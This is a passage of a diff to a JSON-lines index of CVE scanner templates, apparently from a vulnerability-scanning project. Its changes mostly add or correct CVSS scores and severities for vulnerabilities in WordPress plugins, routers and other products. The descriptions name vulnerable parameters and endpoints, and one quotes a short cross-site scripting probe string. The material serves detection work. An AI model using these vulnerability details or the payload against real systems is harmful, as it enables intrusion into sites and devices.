features.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46107.yaml"} {"ID":"CVE-2021-46379","Info":{"Name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","Severity":"medium","Description":"DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-46379.yaml"} {"ID":"CVE-2021-46381","Info":{"Name":"D-Link DAP-1620 - Local File Inclusion","Severity":"high","Description":"D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46381.yaml"} {"ID":"CVE-2021-46387","Info":{"Name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","Severity":"medium","Description":"ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-46387.yaml"} @@ -1423,7 +1427,7 @@ {"ID":"CVE-2022-0149","Info":{"Name":"WooCommerce Stored Exporter WordPress Plugin \u003c 2.7.1 - Cross-Site Scripting","Severity":"medium","Description":"The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0149.yaml"} {"ID":"CVE-2022-0150","Info":{"Name":"WordPress Accessibility Helper \u003c0.6.0.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0150.yaml"} {"ID":"CVE-2022-0165","Info":{"Name":"WordPress Page Builder KingComposer \u003c=2.9.6 - Open Redirect","Severity":"medium","Description":"WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0165.yaml"} -{"ID":"CVE-2022-0169","Info":{"Name":"Photo Gallery by 10Web \u003c 1.6.0 - SQL Injection","Severity":"critical","Description":"The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0169.yaml"} +{"ID":"CVE-2022-0169","Info":{"Name":"Photo Gallery by 10Web \u003c 1.6.0 - SQL Injection","Severity":"critical","Description":"The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0169.yaml"} {"ID":"CVE-2022-0189","Info":{"Name":"WordPress RSS Aggregator \u003c 4.20 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"WordPress RSS Aggregator \u003c 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0189.yaml"} {"ID":"CVE-2022-0201","Info":{"Name":"WordPress Permalink Manager \u003c2.2.15 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0201.yaml"} {"ID":"CVE-2022-0206","Info":{"Name":"WordPress NewStatPress \u003c1.3.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin before 1.3.6 is susceptible to cross-site scripting. The plugin does not properly escape the whatX parameters before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0206.yaml"} @@ -1512,7 +1516,7 @@ {"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1595.yaml"} {"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1597.yaml"} {"ID":"CVE-2022-1598","Info":{"Name":"WordPress WPQA \u003c5.5 - Improper Access Control","Severity":"medium","Description":"WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1598.yaml"} -{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2022/CVE-2022-1609.yaml"} +{"ID":"CVE-2022-1609","Info":{"Name":"The School Management \u003c 9.9.7 - Remote Code Execution","Severity":"critical","Description":"The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-1609.yaml"} {"ID":"CVE-2022-1713","Info":{"Name":"Drawio \u003c18.0.4 - Server-Side Request Forgery","Severity":"high","Description":"Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1713.yaml"} {"ID":"CVE-2022-1724","Info":{"Name":"WordPress Simple Membership \u003c4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1724.yaml"} {"ID":"CVE-2022-1756","Info":{"Name":"Newsletter \u003c 7.4.5 - Cross-Site Scripting","Severity":"medium","Description":"The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1756.yaml"} @@ -1612,7 +1616,7 @@ {"ID":"CVE-2022-26159","Info":{"Name":"Ametys CMS Information Disclosure","Severity":"medium","Description":"Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-26159.yaml"} {"ID":"CVE-2022-26233","Info":{"Name":"Barco Control Room Management Suite \u003c=2.9 Build 0275 - Local File Inclusion","Severity":"high","Description":"Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the \"GET /..\\..\" substring.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-26233.yaml"} {"ID":"CVE-2022-26263","Info":{"Name":"Yonyou U8 13.0 - Cross-Site Scripting","Severity":"medium","Description":"Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26263.yaml"} -{"ID":"CVE-2022-2627","Info":{"Name":"WordPress Newspaper \u003c12 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2627.yaml"} +{"ID":"CVE-2022-2627","Info":{"Name":"WordPress Newspaper \u003c 12 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2627.yaml"} {"ID":"CVE-2022-2633","Info":{"Name":"All-In-One Video Gallery \u003c=2.6.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-2633.yaml"} {"ID":"CVE-2022-26352","Info":{"Name":"DotCMS - Arbitrary File Upload","Severity":"critical","Description":"DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-26352.yaml"} {"ID":"CVE-2022-26564","Info":{"Name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","Severity":"medium","Description":"HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-26564.yaml"} @@ -1772,7 +1776,7 @@ {"ID":"CVE-2022-4063","Info":{"Name":"WordPress InPost Gallery \u003c2.1.4.1 - Local File Inclusion","Severity":"critical","Description":"WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4063.yaml"} {"ID":"CVE-2022-40684","Info":{"Name":"Fortinet - Authentication Bypass","Severity":"critical","Description":"Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40684.yaml"} {"ID":"CVE-2022-40734","Info":{"Name":"Laravel Filemanager v2.5.1 - Local File Inclusion","Severity":"medium","Description":"Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-40734.yaml"} -{"ID":"CVE-2022-40843","Info":{"Name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","Severity":"critical","Description":"The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2022/CVE-2022-40843.yaml"} +{"ID":"CVE-2022-40843","Info":{"Name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","Severity":"medium","Description":"The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2022/CVE-2022-40843.yaml"} {"ID":"CVE-2022-40879","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-40879.yaml"} {"ID":"CVE-2022-40881","Info":{"Name":"SolarView 6.00 - Remote Command Execution","Severity":"critical","Description":"SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40881.yaml"} {"ID":"CVE-2022-4117","Info":{"Name":"WordPress IWS Geo Form Fields \u003c=1.0 - SQL Injection","Severity":"critical","Description":"WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4117.yaml"} @@ -1851,7 +1855,7 @@ {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} {"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"} -{"ID":"CVE-2023-0448","Info":{"Name":"WP Helper Lite \u003c 4.3 - Cross-Site Scripting","Severity":"medium","Description":"The WP Helper Lite WordPress plugin, in versions \u003c 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-0448.yaml"} +{"ID":"CVE-2023-0448","Info":{"Name":"WP Helper Lite \u003c 4.3 - Cross-Site Scripting","Severity":"medium","Description":"The WP Helper Lite WordPress plugin, in versions \u003c 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0448.yaml"} {"ID":"CVE-2023-0514","Info":{"Name":"Membership Database \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0514.yaml"} {"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} @@ -1869,9 +1873,9 @@ {"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"} {"ID":"CVE-2023-1454","Info":{"Name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1454.yaml"} {"ID":"CVE-2023-1496","Info":{"Name":"Imgproxy \u003c 3.14.0 - Cross-site Scripting (XSS)","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1496.yaml"} -{"ID":"CVE-2023-1546","Info":{"Name":"MyCryptoCheckout \u003c 2.124 - Cross-Site Scripting","Severity":"medium","Description":"The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1546.yaml"} +{"ID":"CVE-2023-1546","Info":{"Name":"MyCryptoCheckout \u003c 2.124 - Cross-Site Scripting","Severity":"medium","Description":"The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1546.yaml"} {"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"} -{"ID":"CVE-2023-1698","Info":{"Name":"WAGO - Remote Command Execution","Severity":"high","Description":"In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1698.yaml"} +{"ID":"CVE-2023-1698","Info":{"Name":"WAGO - Remote Command Execution","Severity":"critical","Description":"In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1698.yaml"} {"ID":"CVE-2023-1730","Info":{"Name":"SupportCandy \u003c 3.1.5 - Unauthenticated SQL Injection","Severity":"critical","Description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1730.yaml"} {"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"} {"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"} @@ -1883,7 +1887,7 @@ {"ID":"CVE-2023-20889","Info":{"Name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","Severity":"high","Description":"Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-20889.yaml"} {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} -{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} +{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} {"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"} {"ID":"CVE-2023-22480","Info":{"Name":"KubeOperator Foreground `kubeconfig` - File Download","Severity":"critical","Description":"KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22480.yaml"} {"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"} @@ -1894,7 +1898,7 @@ {"ID":"CVE-2023-23333","Info":{"Name":"SolarView Compact 6.00 - OS Command Injection","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23333.yaml"} {"ID":"CVE-2023-23488","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.9.8 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23488.yaml"} {"ID":"CVE-2023-23489","Info":{"Name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","Severity":"critical","Description":"WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23489.yaml"} -{"ID":"CVE-2023-23491","Info":{"Name":"Quick Event Manager \u003c 9.7.5 - Cross-Site Scripting","Severity":"medium","Description":"The Quick Event Manager WordPress Plugin, version \u003c 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-23491.yaml"} +{"ID":"CVE-2023-23491","Info":{"Name":"Quick Event Manager \u003c 9.7.5 - Cross-Site Scripting","Severity":"medium","Description":"The Quick Event Manager WordPress Plugin, version \u003c 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-23491.yaml"} {"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n\nNote that CVE-2023-23492 incorrectly describes and scores this as SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492.yaml"} {"ID":"CVE-2023-2356","Info":{"Name":"Mlflow \u003c2.3.0 - Local File Inclusion","Severity":"high","Description":"Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2356.yaml"} {"ID":"CVE-2023-23752","Info":{"Name":"Joomla! Webservice - Password Disclosure","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-23752.yaml"} @@ -1917,6 +1921,7 @@ {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"} {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation 